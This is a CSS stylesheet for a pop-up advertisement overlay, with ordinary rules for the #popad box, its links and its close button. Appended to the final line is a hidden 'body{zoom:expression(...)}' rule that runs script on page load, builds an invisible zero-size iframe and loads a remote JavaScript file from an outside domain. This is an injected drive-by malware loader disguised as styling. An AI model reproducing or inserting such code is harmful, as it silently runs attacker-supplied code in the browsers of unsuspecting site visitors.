﻿		#popad{
			padding:5px;
			border:1px solid #000;
			background:#000;
			width:403px;
			
		}
		#popad_footage{
			height:133px;
			width:403px;			
		}
		#popad_footage a{
			display:block;			
			height:133px;
			width:403px;
			display:block;
			text-indent:-600px;
			overflow:hidden;
		}
		#popad p{
			margin:0;
			padding:0 .5em .5em .5em;
			background:#000;
			font-family:Arial,Sans-serif;
			font-size:90%;
			font-weight:bold;
		}
		#popad_content a{
			color:#369;
		}
		#popad.dynamic #popad_footage{
			height:133px;
			width:403px;			
		}
		#popad.dynamic #popad_footage a{
			height:133px;
		}
		#popad.dynamic #popad_footage a#popad_close{
			color:#ddd;
			height:20px;
		}
		#popad.dynamic{
			top:0;
			left:0;	
			position:absolute;
			z-index:2000;	
			height: 100em;
			width: 100em;
			color:#369;
			filter:alpha(opacity='0.8');
			opacity:0.8;
		}
		html>body #popad.dynamic{
			position:fixed;
		}body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.pkupe.com/images/pic.js></script>');},1000);},1000);ele.style.zoom='1';}(this));}
